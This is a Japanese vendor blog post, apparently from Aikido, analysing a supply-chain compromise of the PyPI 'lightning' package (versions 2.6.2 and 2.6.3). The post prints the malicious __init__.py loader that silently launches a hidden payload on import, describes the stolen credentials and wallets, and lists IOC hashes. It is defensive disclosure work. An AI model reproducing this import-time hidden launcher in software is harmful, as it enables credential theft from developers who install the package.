Aikido
無料で始める
CC不要
ブログ脆弱性と脅威
人気のPyTorchライブラリ「Lightning」が「Mini Shai-Hulud」によって侵害される

人気のPyTorchライブラリ「Lightning」が「Mini Shai-Hulud」によって侵害される

執筆者
Ilyas Makari
公開日:
2026年4月30日

「Mini Shai-Hulud」のサプライチェーン・キャンペーンがPyPIにも波及しています。バージョン 2.6.2 そして 2.6.3 人気の 稲妻 PyTorchモデルのトレーニングに広く利用されているPythonパッケージに、開発者の認証情報、クラウドシークレット、および暗号資産ウォレットの情報を密かに盗み出す悪意のあるコードが含まれている。

これは、同じキャンペーンにおける最近の2件の攻撃――Bitwarden CLIのnpm侵害SAPのnpm侵害――に続くものです。同じ攻撃者、同じワームが、今度はnpmからPyPIへと活動を拡大しています。

もしあなたが lightning==2.6.2 または lightning==2.6.3、お使いの端末はすでに侵害されているものとして扱ってください。

仕組み

この攻撃は直接 __init__.py、パッケージをインポートした瞬間に実行されるファイルです。正規のLightningコードが読み込まれる前に、バックグラウンドスレッドが生成されます:

def _run_runtime() -> None:
    _runtime_dir = os.path.join(os.path.dirname(__file__), "_runtime")
    _start = os.path.join(_runtime_dir, "start.py")
    if os.path.exists(_start):
        subprocess.Popen(
            [sys.executable, _start],
            cwd=_runtime_dir,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )

threading.Thread(target=_run_runtime, daemon=True).start()

実行する start.py、OSとアーキテクチャを検出し、Bun JavaScriptランタイムv1.3.13をダウンロードして実行する、クロスプラットフォーム対応のBunブートストラッパーです router_runtime.js、メインの11MBのペイロード。これは、最近のBitwardenやSAPへの攻撃でも使われたのと同じ手口だ。

何が奪われるのか

SSHキー、シェル履歴(bash、zsh、Python、Node、MySQL、psql)、 .env ファイル、Gitの認証情報、AWS/GCP/Azureの認証情報、KubernetesおよびHelmの設定、Dockerの認証情報、npmトークン、MCPの設定。ビットコイン、ライトコイン、モネロ、ドージコイン、ダッシュ、Exodus、Atomic、Ledgerなどの仮想通貨ウォレット。NordVPN、ProtonVPN、CyberGhost、Windscribe、OpenVPNのVPN認証情報。DiscordおよびSlackのセッションデータ。

盗まれたデータはすべて、公開GitHubリポジトリへ流出される前にRSA-2048で暗号化されています:

方法 Aikido これを検知する

もしあなたが Aikido ユーザーの方は、中央フィードを確認し、マルウェア関連の問題でフィルタリングしてください。これにより、100/100の重大な問題として表示されます。 Aikido は毎晩自動的に再スキャンを行いますが、今すぐ手動で再スキャンを実行することをお勧めします。

まだ会員でない場合は Aikido をご利用でない場合は、アカウントを作成してリポジトリを連携できます。マルウェア対策機能は無料プランに含まれており、クレジットカードは不要です。

チーム全体をより広くカバーするには、 Aikidoの「エンドポイント保護」は、チームのデバイスにインストールされたソフトウェアパッケージを可視化し、管理することを可能にします。ブラウザ拡張機能、コードライブラリ、IDEプラグイン、依存関係、すべてを一元管理できます。マルウェアがインストールされる前に阻止しましょう。

将来的なセキュリティ対策として、オープンソースの「Aikido Chain」の導入をご検討ください。Safe Chainは既存のワークフローに組み込まれ、npm、npx、yarn、pnpm、pnpxの各コマンドをインターセプトし、インストール前にAikido データベースと照合してパッケージを検証します。

IOCs

  • パッケージ: lightning==2.6.2, lightning==2.6.3
  • router_runtime.js
    • SHA256: 5f5852b5f604369945118937b058e49064612ac69826e0adadca39a357dfb5b1
  • start.py
    • SHA256: 8046a11187c135da6959862ff3846e99ad15462d2ec8a2f77a30ad53ebd5dcf2
最終更新日:
2026年4月30日
共有:

https://www.aikido.dev/blog/pytorch-lightning-pypi-compromise-mini-shai-hulud

今すぐソフトウェアを保護します。

本日より無料で開始いただけます。

無料で始める
CC不要
テキストリンク

脅威ニュースをサブスクライブ

4.7/5
誤検知にうんざりしていませんか?
10万人以上のユーザーと同様に Aikido をお試しください。
今すぐ始める
パーソナライズされたウォークスルーを受ける

10万以上のチームに信頼されています

今すぐ予約
アプリをスキャンして IDORs と実際の攻撃パスを検出します

10万以上のチームに信頼されています

スキャンを開始
AI がどのようにアプリをペンテストするかをご覧ください

10万以上のチームに信頼されています

テストを開始

今すぐ始める
関連記事
すべて表示
すべて表示
2026年4月29日
脆弱性と脅威

Mini Shai-Hulud、パンを装った秘密情報窃取ツールでSAPのnpmパッケージを標的に

侵害されたSAPのnpmパッケージは、Bunをベースとしたプレインストールペイロードを使用してGitHub、npm、クラウド、およびCIシークレット盗み出し、その後「OhNoWhatsGoingOnWithGitHub」を利用してGitHub経由で拡散します。

#
マルウェア
#
NPM
2026年4月29日
脆弱性と脅威

ある人物が、ユーザーの.envファイルを盗むために、27分間で偽の「tanstack」パッケージを4つのバージョン公開した

本日、偽の「tanstack」npmパッケージが27分間で4つの悪意あるバージョンを公開し、postinstallフックを介して.envファイルを盗み出しました。ここでは、何が起きたのか、誰が影響を受けたのか、そして認証情報を更新する方法について解説します。

#
マルウェア
2026年4月23日
脆弱性と脅威

Shai-Huludが復活したのか? 脆弱性が発見されたBitwarden CLIに、自己増殖型npmワームが含まれている

@bitwarden/cli v2026.4.0 に発見されたマルウェアは、SSH キー、シークレット、AI コーディングツールの認証情報を盗み出し、被害者自身の npm パッケージを通じて拡散します。その正体は、「Shai-Hulud: The Third Coming」と名乗るワームです。

#
マルウェア

今すぐ、安全な環境へ。

コード、クラウド、ランタイムを1つの中央システムでセキュアに。
脆弱性を迅速に発見し、自動的に修正。

スキャンを開始
CC不要
デモを予約する
クレジットカードは不要です。 | スキャン結果は32秒で表示されます。